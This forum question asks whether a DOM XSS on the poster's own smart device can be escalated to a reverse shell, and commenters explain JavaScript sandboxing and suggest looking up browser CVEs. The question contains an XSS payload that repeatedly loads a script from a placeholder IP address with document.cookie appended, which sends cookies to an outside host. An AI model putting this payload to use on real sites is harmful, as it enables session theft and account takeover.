# Is it possible to elevate this Reverse TCP Connection to spawn a shell environment using JS?

Tags: javascript

I recently got a smart device that I've been fiddling with and I am able to feed it any JS code and it will run that code. I immediately tried to spawn a reverse shell environment but seem to only get the reverse TCP connection but I am missing the shell environment that I am looking for. From my research, I'm starting to realize that JS by it self might not be capable of this?

Using Node.js is out of the question as I am trying to get code to run client side and not server side, unless there would be a way to do that using Node? I have tried using Node to do this exact thing but even when I have spawned a shell environment using node it essentially spawns a shell on myself (Since I'm the one hosting the Node server) and the info of running shell commands simply just shows up client side (through the use of alerts for example) but is really ran server side.

I have heard of tons of javascript malware that has been successful in downloading malicious files or infecting a machine, so part of me believes that JS is capable of this? I essentially found a DOM XSS vulnerability on a smart device I own and I'm wondering if I can leverage this vulnerability in a way to gain system access to the device.

Code to gain reverse TCP connection:

```
<script>setInterval(function(){with(document)body.appendChild(createElement("script")).src="<IP ADDR HERE:PORT>?"+document.cookie},1010)</script>
```

Comment: Ok, the full picture on this: JS is sandboxed in all modern implementations and even if it wasn't, it doesnt have any OS level API. Unless you figure out a vulnerability on your particular JS implementation you are limited to doing normal Javascript things (edit the DOM, click buttons on your website, manipulate your small part of the browser history)

Comment: Also: does it really run the code or just host it in a webserver? I am interested, does it display the website you feed it on some screen?

Comment: This smart device will visit my website that I am hosting on the same network and on that website I will host JS code, and any JS code at all, and it will run that code locally. It also displays the website etc, I more or less view it as a JS compiler.

Comment: interesting, you should check the user agent your webserver receives for what browser and version it has. If you are lucky and its old enough you can probably find some CVEs on it